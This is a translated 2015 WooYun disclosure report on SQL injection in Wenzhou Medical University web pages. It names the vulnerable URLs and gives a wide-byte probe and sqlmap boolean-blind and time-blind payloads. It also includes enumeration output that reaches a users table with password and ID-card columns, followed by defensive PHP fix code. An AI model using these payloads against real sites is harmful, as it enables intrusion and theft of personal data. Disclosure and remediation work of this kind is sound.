
Vulnerability summary

Defect ID: wooyun-2015-0114090

Title: Multiple SQL injection vulnerabilities at Wenzhou Medical University

Vendor: Wenzhou Medical University (温州医科大学)

Author: 凌零0

Submitted: 2015-05-14 18:15

Fix time: 2015-05-19 18:16

Published: 2015-05-19 18:16

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-14: Details sent to the vendor, awaiting vendor handling
2015-05-19: Vendor has chosen to ignore the vulnerability; details disclosed to the public

Brief description:

I set out to look for a wide-byte injection at http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab, tried it on a whim, haha... http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab%df' hits.

Detailed description:

1. http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab


2. http://rsc.wmu.edu.cn/List.php?BigCategoryId=28
3. http://rsc.wmu.edu.cn/List.php?BigCategoryId=28&SmallCategoryId=76 (BigCategoryId parameter)
<code>GET parameter 'BigCategoryId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 204 HTTP(s) requests:
---
Parameter: BigCategoryId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: BigCategoryId=28 AND 2471=2471
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: BigCategoryId=28 AND (SELECT * FROM (SELECT(SLEEP(5)))tznW)
---
[13:04:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.12


available databases [3]:
[*] information_schema
[*] rsc_wzmc_edu_cn
[*] test
</code>

Proof of vulnerability:

Database: rsc_wzmc_edu_cn
[8 tables]
+---------------------------------------+
| xsc_bigcategory |
| xsc_infolist |
| xsc_managers |
| xsc_photoinfolist |
| xsc_smallcategory |
| xsc_special |
| xsc_users |
| xsc_webinfo |
+---------------------------------------+
Database: test
[2 tables]
+---------------------------------------+
| SQL Statement |
| xsxx |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+


Looking at the xsc_users table:

[13:33:52] [INFO] retrieved: id
[13:33:57] [INFO] retrieved: bigint(20)
[13:34:20] [INFO] retrieved: username <---------
[13:34:42] [INFO] retrieved: varchar(50)
[13:35:13] [INFO] retrieved: password <---------
[13:35:34] [INFO] retrieved: varchar(50)
[13:36:02] [INFO] retrieved: usertype
[13:36:25] [INFO] retrieved: varchar(10)
[13:36:57] [INFO] retrieved: realname
[13:37:16] [INFO] retrieved: varchar(50)
[13:37:43] [INFO] retrieved: nation
[13:37:58] [INFO] retrieved: varchar(10)
[13:38:29] [INFO] retrieved: sex
[13:38:38] [INFO] retrieved: varchar(10)
[13:39:08] [INFO] retrieved: birthyear
[13:39:35] [INFO] retrieved: varchar(50)
[13:40:03] [INFO] retrieved: birthmonth
[13:40:29] [INFO] retrieved: varchar(50)
[13:40:55] [INFO] retrieved: birthday
[13:41:16] [INFO] retrieved: varchar(50)
[13:41:48] [INFO] retrieved: nativeplace
[13:42:24] [INFO] retrieved: varchar(50)
[13:42:50] [INFO] retrieved: cardid
[13:43:12] [INFO] retrieved: varchar(255)
[13:43:45] [INFO] retrieved: telephone
[13:44:09] [INFO] retrieved: varchar(5

Not finished running yet.

Fix suggestion:

Filter the input; there may also be an encoding problem. You are the experts here ~ ~
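One way to carry out that fix for the two endpoints named above, as an added example that is not part of the original report or the university's own code: the connection charset is set through the driver so the escaping layer and the server agree (the mismatch a wide-byte payload relies on), and every parameter is validated and then bound rather than concatenated. It assumes a current PHP with mysqli/mysqlnd; the credentials, column names and the xsc_infolist schema are assumptions for illustration.

```php
<?php
// Added example (not from the original report). Hardened handling of
// view.php?id=<uuid> and List.php?BigCategoryId=<int>&SmallCategoryId=<int>.

function dbConnect(): mysqli {
    // Placeholder credentials; the database name is the one shown in the report.
    $db = new mysqli('localhost', 'app_user', 'CHANGE_ME', 'rsc_wzmc_edu_cn');
    // Set the charset via the driver, not with a raw "SET NAMES" query, so that
    // client-side escaping knows the real server charset. A bare SET NAMES leaves
    // the two out of sync, which is what a %df' style wide-byte payload needs.
    $db->set_charset('utf8mb4');
    return $db;
}

// Strict allow-list for the UUID-shaped id used by view.php.
function isValidUuid(string $id): bool {
    return (bool) preg_match(
        '/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/', $id);
}

// Assumed columns title/body on xsc_infolist (the table name is from the report).
function fetchArticle(mysqli $db, string $id): ?array {
    if (!isValidUuid($id)) {
        http_response_code(400);   // reject anything that is not a plain UUID
        return null;
    }
    $stmt = $db->prepare('SELECT title, body FROM xsc_infolist WHERE id = ?');
    $stmt->bind_param('s', $id);   // bound as data, never spliced into the SQL text
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// Assumed columns bigcategoryid/smallcategoryid on xsc_infolist.
function listCategory(mysqli $db, string $big, ?string $small): array {
    // FILTER_VALIDATE_INT returns false for anything that is not a whole integer,
    // so a value such as "28 AND 2471=2471" never reaches the query.
    $opts  = ['options' => ['min_range' => 1]];
    $bigId = filter_var($big, FILTER_VALIDATE_INT, $opts);
    if ($bigId === false) { http_response_code(400); return []; }
    if ($small === null) {
        $stmt = $db->prepare('SELECT id, title FROM xsc_infolist WHERE bigcategoryid = ?');
        $stmt->bind_param('i', $bigId);
    } else {
        $smallId = filter_var($small, FILTER_VALIDATE_INT, $opts);
        if ($smallId === false) { http_response_code(400); return []; }
        $stmt = $db->prepare('SELECT id, title FROM xsc_infolist '
                           . 'WHERE bigcategoryid = ? AND smallcategoryid = ?');
        $stmt->bind_param('ii', $bigId, $smallId);
    }
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}
```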

Copyright notice: when reposting, please credit the source: 凌零0@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-05-19 18:16

Vendor reply:

Latest status:

None

